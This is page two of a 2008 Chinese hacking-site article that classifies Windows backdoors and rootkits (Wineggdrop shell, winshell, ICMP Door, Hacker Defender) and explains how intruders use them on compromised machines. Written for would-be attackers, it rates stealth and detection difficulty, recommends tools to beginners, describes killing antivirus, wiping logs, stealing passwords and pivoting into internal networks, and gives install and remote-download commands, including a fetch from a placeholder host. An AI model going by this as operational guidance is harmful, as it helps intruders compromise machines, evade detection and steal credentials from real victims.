后门的分类及各种入侵方法说明

新客网 XKER.COM 2008-02-14 来源：新客网搜集整理佚名收藏本文

　3.扩展后门

　　所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。

　　类型：系统后门

　　使用范围：win2000/xp/2003

　　隐蔽程度：★★★★☆

　　使用难度：★★☆☆☆

　　危害程度：★★★★☆

　　查杀难度：★★★★☆

　　这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：进程管理，可查看，杀进程(支持用进程名或PID来杀进程);注册表管现(查看，删除，增加等功能);服务管理(停止，启动，枚举，配置，删除服务等功能)端口到程序关联功能(fport);系统重启，关电源，注销等功能(reboot,poweroff,shutdown,logoff);嗅探密码功能;安装终端，修改终端端口功能;端口重定向功能(多线程，并且可限制连接者IP);HTTP服务功能(多线程，并且可限制连接者IP);Socd5代理功能(支持两种不同方式验证，可限制连接者IP);克隆账号，检测克隆账户功能(clone,checkclone);加强了的FindpassWord功能(可以得到所有登录用户，包括使用克隆账户远程登录用户密码);HTTP代理(完全匿名，支持oicq、 MSN、mirc等程序);其他辅助功能，http下载，删除日志，系统信息，恢复常用关联，枚举系统账户等。

　　当网络上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和“后门”的原始定义是有出入的：一旦你需要实现越多的功能，那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。

　　运用举例

　　在安装后门前，需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置，从10个具体配置中，包括了插入线程、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：

　　Fport:列出进程到端口的列表，用于发现系统中运行程序所对应的端口，可以用来检测常见的隐蔽的后门。

　　Reboot:重启系统，如果你上传并运行了其他后门程序，并需要重启机器以便让后门正常工作，那使用这个命令吧!

　　Shell:得到一个Dos Shell,这个不多讲了，直接得到服务器或者肉鸡上的cmd shell。

　　Pskill PID或程序名：用于杀掉特定的服务，比如杀毒软件或者是防火墙。

　　Execute程序：在后台中执行程序，比如sniffer等。http://ip/文件名保存文件名：下载程序，直接从网上down一个后门到服务器上。

　　Installterm端口：在没有安装终端服务的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。

　　StopService/StartService:停止或者启动某个系统服务，比如telnet。

　　CleanEvent:删除系统日志。

　　Redirect:TCP数据转发，这个功能是后门程序中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用!

　　EnumService:列举所有自动启动的服务的资料，比如后门、木马。

　　RegEdit:进入注册表操作模式，熟悉注册表的使用者终于在后门中找到了福音! !

　　Findpassword:得到所有登录用户密码，比我们常用的findpass功能可强多了。

　　总体来讲，Wineggdrop shell是后门程序中很出彩的一个，它经过作者几次大规模的修改和升级，已经趋于稳定，功能的强大当然没得说，但是由于功能太强大，被查杀和怀疑是难以避免的，所以很多人在使用Wineggdrop shell一段时间后就发现肉鸡飞了，其实是很正常的事，我你出不用气馁，其实用很简单的方法就可以很好地提高它的隐蔽性，下文将有说明。

　　相对于Wineggdrop shell来说，独孤剑客的winshell在功能上就不那么全面了，但是笔者推荐新手更多的使用winshell而不是Wineggdrop shell，因为winshell功能除了获得一个shell以外，只加入了一些重启、关闭服务器的命令，功能相对简单，但完全使用系统自带的cmd来执行命令，对系统学习和掌握也是非常有帮助的!

　　Winshell和wolf这两者都是国内早期顶尖的后门程序，程序的编制无疑是非常经典的，新手学习时使用这两款后门一定能让你明白很多系统相关东西，了解很多入侵思路和方法。

　　4、C/S后门

　　传统的木马程序常常使用C/S构架，这样的构架很方便控制，也在一定程度上避免了“万能密码”的情况出现，对后门私有化有一定的贡献，这方面分类比较模糊，很多后门可以归结到此类中，比如较巧妙的就是ICMP Door了

　　类型：系统后门

　　使用范围：win2000/xp/2003 2Z6

　　隐蔽程度：★★★★★

　　使用难度：★★★☆☆

　　危害程度：★★★★☆

　　查杀难度：★★★★★

　　这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务程序编制都在这方面独特的思维角度和眼光!

　　运用举例

　　这个后门其实用途最广的地方在于突破网关后对内网计算机的控制，因为很多机密数据都是放在内网计算机上的，而控制内网计算机并不是我们想到位的商业网络进行入侵检测，它的网络内部并不像我们常见的内网那样非常容易入侵和控制，因为该公司本身涉及到一些网络安全的服务，所以内网个人计算机的防护是很到位的，在尝试过很多后门后，最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。

　　首先使用icmpsrv.exe -install参数进行后门的安装，再使用icmpsend.exe IP进行控制，可以用：[http://xxx.xxx.xxx/admin.exe -hkfx.exe]方式下载文件，保存在\\system32\目录下，文件名为hkfx.exe，程序名前的“-”不能省去，使用[pslist]还可以列出远程主机的进程名称和pid，再使用[pskill id]就可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。

　　这个后门是采用的c/s构架，必须要使用icmpsend才能激活服务器，但是他也有自己的先天不足：后门依靠ICMP进行通讯，现在的网络，经过冲击波的洗礼后，很少有服务器还接受ICMP包了，很多都屏蔽掉了它，所以用它来控制服务器不是一个好办法，这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧?!

5.root kit

　　如果说上面的后门程序都各有千秋、各有所长的话，它们和经典的root kit 一比简直就是小巫见大巫了，那究竟什么样是root kit呢?

　　root kit出现于20世纪90年代初，在1994年2月的一篇安全咨询报告中首先使用了root kit这个名词。从出现至今，root kit 的技术发展非常迅速，应用越来越广泛，检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的root kit最多。

　　很多人有一个误解，他们认为root kit 是用作获得系统root访问权限的工具。实际上，root kit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，进入系统后，攻击者会在侵入的主机中安装root kit，然后他将经常通过root kit的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和密码之后，攻击者就会利用这些信息侵入其他系统。

　　从unix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能!现在网络上常见的root kit 是内核级后门软件，用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。程序安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门技术允许植入reDirector，是非常难以查杀的一个东东，让很多网络管员非常头疼!

　　hacker defender

　　类型：系统后门

　　使用范围：win200/xp/2003

　　隐蔽程度：★★★★★

　　使用难度：★★★★★

　　危害程度：★★★★★

　　查杀难度：★★★★★(呵呵，全部五星，因为它太“霸道”了)

　　现在最新版本的hxdf是1.0.0，它是从国外传过来的一个程序，包含两个关键程序，里面的配置文件ini非常复杂，相信新手使用也是很困难的主要包括：[Hidden Table]，[Root Processes]，[HiddenServices]，[Hidden RegKeys]，[Hidden RegValues]，[Startup Run]，[Free Space],[Hidden pORTS]，[Settings]。对功能就是隐藏文件(目录)、隐藏进程、隐蔽服务、隐藏注册键、隐藏注册表键值、启动程序、增加磁盘剩余空间、隐藏端口、后门设置，具体配置我们就不具体讲解了，本期文章有详细的介绍，我们说说它的特点(纯粹个人观点和经验偏激的地方请大家海涵)：

　　(1)可以实现正常系统TCP端口的通讯，比如80等，这个功能在高级后门并不鲜见。

　　(2)能得到简单的系统SHELL，对入侵的老手来说这就够了，多余的功能反而是累赘。

　　(3)隐藏端口，如果你非要使用TCP的某一个非常规端口通讯，那使用这个功能吧，放心，别人发现不了。

　　(4)隐藏后门的所有可找到东西!这个只能用一个字来形容：牛!比如隐藏文件、服务、注册表键等功能，虽然我们说起来是一句话，想念识货的朋友应该能发现这中间NB的地方!

　　(5)史上最经典后门思维：配合其他扩展型后门使用，效果好得出乎你的意料!(这是后面的内容，我们马上讲到)。

　　抛开其他不讲，系统中安装了这样的root kit，你通过普通的查杀途径根本检测不到这个程序这点就非常值得我们利用了!试想：一个在你服务器上运行的后门，你连看都看不到它，别说查杀了!

共3页: 上一页 [1] [2] [3] 下一页

上一篇：菜鸟晋级！用 IE 就能远程控制电脑下一篇：新的挂马方式 ARP欺骗挂马称雄局域网

【收藏】【评论】【推荐】【投稿】【打印】【关闭】